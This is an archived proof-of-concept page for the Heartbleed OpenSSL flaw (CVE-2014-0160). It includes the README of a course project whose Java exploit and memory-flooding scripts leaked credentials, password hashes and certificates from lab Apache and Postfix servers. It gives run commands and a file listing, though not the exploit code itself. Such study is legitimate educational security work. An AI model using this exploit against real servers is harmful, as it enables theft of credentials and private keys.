关联漏洞
标题:
OpenSSL 缓冲区错误漏洞
(CVE-2014-0160)
描述:OpenSSL是OpenSSL团队开发的一个开源的能够实现安全套接层(SSL v2/v3)和安全传输层(TLS v1)协议的通用加密库,它支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 OpenSSL的TLS和DTLS实现过程中的d1_both.c和t1_lib.c文件中存在安全漏洞,该漏洞源于当处理Heartbeat Extension数据包时,缺少边界检查。远程攻击者可借助特制的数据包利用该漏洞读取服务器内存中的敏感信息(如用户名、密码、Cookie、私钥等)。以下版本的OpenSSL受到
描述
This is the Heratbleed bug (CVE-2014-0160) documentation I did for Advenced Cyber Attacks course.
介绍
# Heartbleed Attack: Java-Based Attack Demo
## Overview
This repository features `Heartbleed.java`, a custom Java-based exploit designed to demonstrate the Heartbleed vulnerability (CVE-2014-0160) by extracting sensitive data from a vulnerable server (IP: 192.168.1.132) running Apache (port 443) and Postfix (port 465). The exploit sends malformed TLS heartbeat requests, leveraging the vulnerability in unpatched OpenSSL versions (1.0.1 to 1.0.1f) to leak up to 64KB of memory per request. Supporting Bash scripts (`apache_memload.sh` and `postfix_memload.sh`) flood the services’ memory with sensitive data, such as user credentials, mail server passwords, and SSL certificates, which the Java exploit then extracts.
This project is part of a comprehensive security demonstration documented in a detailed Word document, which outlines the attack methodology, results, and implications for both Apache and Postfix services. The work involved crafting scripts to load memory, executing the exploit from a Windows client (IP: 192.168.1.99) and analyzing the leaked data to highlight the vulnerability’s impact.
## About Heartbleed Expolit
`Heartbleed.java` is the core of this demo, implementing a streamlined attack process:
- Establishes a connection to the target server and completes a TLS handshake.
- Sends malformed heartbeat requests via the `sendHeartbeats` method, which is central to the exploit.
- Captures and displays the server’s response, revealing sensitive data in ASCII format.
The `sendHeartbeats` method, a key component, orchestrates the attack by repeatedly sending crafted heartbeat messages to the server, exploiting the Heartbleed vulnerability to extract memory contents. This method’s role is detailed in the accompanying Word document, alongside a screenshot of its implementation.
## Project Scope and Documentation
The full scope of this work includes:
- **Memory Flooding**: Developed `apache_memload.sh` to flood Apache’s memory with 50 `curl` requests, embedding sensitive data like SHA-512 password hashes via a PHP script (`memload.php`). Similarly, `postfix_memload.sh` sends 50 SMTP payloads to Postfix, embedding email credentials and passwords.
- **Exploit Execution**: Ran `Heartbleed.java` from a Windows client (IP: 192.168.1.99) to target Apache (port 443) and Postfix (port 465), successfully leaking data such as user credentials, passwords, and certificates.
- **Documentation**: Compiled a detailed Word document capturing the attack setup, execution, and results. It includes service verification (Apache and Postfix), attack descriptions, screenshots of script outputs and leaked data, an explanation of the `sendHeartbeats` method, and a conclusion with future mitigation strategies.
## Prerequisites
- **Server**:
- Ubuntu Linux server (IP: 192.168.1.132) with:
- Apache2 on port 443 (vulnerable OpenSSL 1.0.1c).
- Postfix on port 465 (vulnerable OpenSSL 1.0.1c).
- `memload.php` at `https://localhost/phpmyadmin/memload.php`.
- **Client**:
- Windows client (IP: 192.168.1.99).
- Java Development Kit (JDK): `sudo apt install openjdk-11-jdk`.
- **Network**:
- Client must reach server on ports 443 and 465.
## Installation
1. **Clone the Repository**:
```bash
git clone https://github.com/Shayhha/HeartbleedAttack
```
2. **Compile the Exploit**:
```bash
javac -d bin Heartbleed.java
```
## Usage
1. **Flood Server Memory** (on 192.168.1.132):
- Apache:
```bash
~/Desktop/apache_memload.sh
```
- Postfix:
```bash
~/Desktop/postfix_memload.sh
```
2. **Run the Exploit** (on 192.168.1.99):
- For Apache (port 443) edit `Heartbleed.java` to set `SERVER_PORT = APACHE_PORT`, recompile, then:
```bash
javac -d bin Heartbleed.java
java -cp bin Heartbleed
```
- For Postfix (port 465) edit `Heartbleed.java` to set `SERVER_PORT = POSTFIX_PORT`, recompile, then:
```bash
javac -d bin Heartbleed.java
java -cp bin Heartbleed
```
## Results
- **Apache**: Leaked user credentials, mail server passwords, and SHA-512 password hashes and SSL certificates.
- **Postfix**: Extracted email headers, shell commands, credentials, passwords, and SSL certificates.
## Ethical Use
This exploit is for educational purposes only. Do not use it to harm systems without explicit permission. Ensure compliance with legal and ethical standards.
## License
MIT License—see [LICENSE](LICENSE.txt) for details.
文件快照
[4.0K] /data/pocs/516ece384e0c4214c382ec6c2f7a1e1daca45a87
├── [4.0K] Bash Scripts
│ ├── [ 742] apache_memload.sh
│ ├── [ 648] memload.php
│ └── [ 742] postfix_memload.sh
├── [4.0K] bin
│ └── [6.0K] Heartbleed.class
├── [4.0K] Heartbleed Attack Demonstration
│ └── [ 210] Heartbleed Attack Demonstration Video.txt
├── [4.0K] Heartbleed Attack Demonstration Screenshots
│ ├── [4.0K] Attacks
│ │ ├── [4.0K] Apache
│ │ │ ├── [617K] Apache leaked HTTPS request and SSL certificate that was used for TLS connection.png
│ │ │ ├── [550K] Apache leaked mail users credentials, including their SHA-512 password hashes and the mail server's database tab.png
│ │ │ ├── [655K] Apache leaked MySQL users credentials, including their SHA-256 password hashes.png
│ │ │ └── [464K] Running apacche_memload.sh to load sensatvie data into Apache memory.png
│ │ └── [4.0K] Postfix
│ │ ├── [1.1M] Postfix leaked mail users information and SSL certificate that was used for TLS connection.png
│ │ ├── [218K] Postfix leaked shell commands used for sending email containing sensative data, including mail password.png
│ │ ├── [1.1M] Postfix leaked the email headers of messages sent via SMTPS, including the sender and recipient information.png
│ │ └── [407K] Running postfix_memload.sh to load sensative data into Postfix memory.png
│ ├── [4.0K] Database with mail users
│ │ ├── [821K] Showing local mail users in mailserver database with their hashes.png
│ │ ├── [1.4M] Showing the user table in mysql database with phpMyAdmin.png
│ │ ├── [829K] Showing the virtual users table in mailserver database with phpMyAdmin.png
│ │ └── [469K] Showing user’s mailbox with emails he received from shay.png
│ ├── [4.0K] OpenSSL
│ │ ├── [646K] Apache, MySQL and Postfix are using OpenSSL 1.0.1c.png
│ │ ├── [4.0K] Mechines Info
│ │ │ ├── [572K] Ubuntu Linux server running OpenSSL 1.0.1c with IP 192.168.1.132.png
│ │ │ └── [ 44K] Windows running Java Heartbleed exploit with IP 192.168.1.99.png
│ │ ├── [101K] Ubuntu Linux server is using OpenSSL 1.0.1c.png
│ │ ├── [929K] Verifying Apache is vulnerable using NMAP Heartbleed test (on Kali Linux machine).png
│ │ └── [913K] Verifying Postfix is vulnerable using NMAP Heartbleed test (on Kali Linux machine).png
│ ├── [4.0K] Postfix with Dovecot
│ │ ├── [1.2M] Reading email in user inbox via Dovecot with IMAP on port 993.png
│ │ └── [928K] Sending email from shay to user via Postfix with SMTPS on port 465.png
│ ├── [4.0K] Scripts
│ │ ├── [349K] Bash script apache_memload.sh for flooding Apache.png
│ │ ├── [548K] Bash script postfix_memload.sh for flooding Postfix.png
│ │ ├── [489K] PHP script memload.php.png
│ │ └── [ 87K] sendMessages method - Heartbleed.java.png
│ └── [4.0K] Sevices
│ ├── [1.3M] Apache service is running on port 443 (HTTPS).png
│ ├── [1.3M] Dovecot service is running on port 993 (IMAP).png
│ ├── [845K] MySQL service is running with phpMyAdmin.png
│ └── [763K] Postfix service is running on port 465 (SMTPS).png
├── [4.0K] Heartbleed Attack Documentation
│ ├── [ 14M] Heartbleed Attack Demonstration.docx
│ ├── [5.2M] Heartbleed Attack Demonstration (PDF).pdf
│ └── [621K] Heartbleed Attack Presentation.pptx
├── [1.0K] LICENSE.txt
├── [4.3K] README.md
└── [4.0K] src
└── [9.5K] Heartbleed.java
15 directories, 39 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。